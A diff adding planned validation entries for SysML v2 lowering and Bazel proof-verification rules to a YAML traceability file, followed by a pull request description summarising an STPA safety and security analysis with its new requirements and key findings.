+  - id: VAL-060
+    type: feature
+    title: SysML v2 unhandled construct diagnostic (planned)
+    description: >
+      Will verify that unrecognized SysML v2 SyntaxKind variants
+      produce a warning diagnostic instead of being silently dropped.
+      Blocked on STPA-REQ-032 implementation.
+    status: planned
+    fields:
+      method: unit-test
+      test-location: crates/spar-sysml2/src/lower.rs
+      test-name: TBD
+    links:
+      - type: satisfies
+        target: STPA-REQ-032
+      - type: satisfies
+        target: ARCH-026
+
+  - id: VAL-061
+    type: feature
+    title: SysML v2 category inference validation (planned)
+    description: >
+      Will verify that part defs with thread-like properties are
+      classified as process/thread (not system), and that subcomponent
+      categories are propagated from referenced type definitions.
+      Blocked on STPA-REQ-033 and STPA-REQ-034 implementation.
+    status: planned
+    fields:
+      method: unit-test
+      test-location: crates/spar-sysml2/src/lower.rs
+      test-name: TBD
+    links:
+      - type: satisfies
+        target: STPA-REQ-033
+      - type: satisfies
+        target: STPA-REQ-034
+      - type: satisfies
+        target: ARCH-027
+
+  - id: VAL-062
+    type: feature
+    title: SysML v2 typed property lowering (planned)
+    description: >
+      Will verify that constraint usages with numeric values and units
+      produce typed PropertyExpr values (not Opaque), enabling downstream
+      scheduling and timing analysis.
+      Blocked on STPA-REQ-035 implementation.
+    status: planned
+    fields:
+      method: unit-test
+      test-location: crates/spar-sysml2/src/lower.rs
+      test-name: TBD
+    links:
+      - type: satisfies
+        target: STPA-REQ-035
+      - type: satisfies
+        target: ARCH-028
+
+  # ══════════════════════════════════════════════════════════════════════
+  # Verification Pipeline Validation
+  # ══════════════════════════════════════════════════════════════════════
+
+  - id: VAL-063
+    type: feature
+    title: Verification tool availability guard (planned)
+    description: >
+      Will verify that verus_verify and lean_verify rules fail with
+      a clear error when the tool binary is not found.
+      Blocked on STPA-REQ-037 implementation.
+    status: planned
+    fields:
+      method: integration-test
+      test-location: tools/bazel/rules_verus/defs.bzl
+      test-name: TBD
+    links:
+      - type: satisfies
+        target: STPA-REQ-037
+      - type: satisfies
+        target: ARCH-030
+
+  - id: VAL-064
+    type: feature
+    title: Generated BUILD includes verification targets (planned)
+    description: >
+      Will verify that workspace_gen.rs produces verus_verify and/or
+      lean_verify targets in per-crate BUILD.bazel files.
+      Blocked on STPA-REQ-038 implementation.
+    status: planned
+    fields:
+      method: unit-test
+      test-location: crates/spar-codegen/src/workspace_gen.rs
+      test-name: TBD
+    links:
+      - type: satisfies
+        target: STPA-REQ-038
+      - type: satisfies
+        target: ARCH-031
+
+  - id: VAL-065
+    type: feature
+    title: Proof log content validation (planned)
+    description: >
+      Will verify that verus_verify and lean_verify rules validate
+      proof log content and reject empty or error-only logs.
+      Blocked on STPA-REQ-039 implementation.
+    status: planned
+    fields:
+      method: integration-test
+      test-location: tools/bazel/rules_verus/defs.bzl
+      test-name: TBD
+    links:
+      - type: satisfies
+        target: STPA-REQ-039
+      - type: satisfies
+        target: ARCH-032


### PR DESCRIPTION
## Summary
- STPA safety update: 27 new artifacts covering SysML v2 lowering + Bazel verification pipeline hazards
- STPA-Sec security analysis: 5 losses, 7 hazards, 12 UCAs, 8 attack paths, 12 security requirements
- rivet validate: PASS (83 warnings, 0 errors)

## Key Findings
- `lower_node` wildcard silently drops unrecognized SysML v2 constructs
- Subcomponent category hardcoded to `System` (defeats scheduling analysis)
- `sanitize_ident` insufficient for cross-language code injection prevention
- Generated BUILD.bazel lacks per-crate verification targets
- Property values lowered as Opaque (invisible to typed accessors)

## New Requirements
- 8 safety requirements (STPA-REQ-032–039)
- 12 security requirements (STPA-SEC-REQ-001–012)

## Test plan
- [x] `rivet validate` passes (83 warnings, 0 errors)
- [ ] Review requirements for accuracy and priority

🤖 Generated with [Claude Code](https://claude.com/claude-code)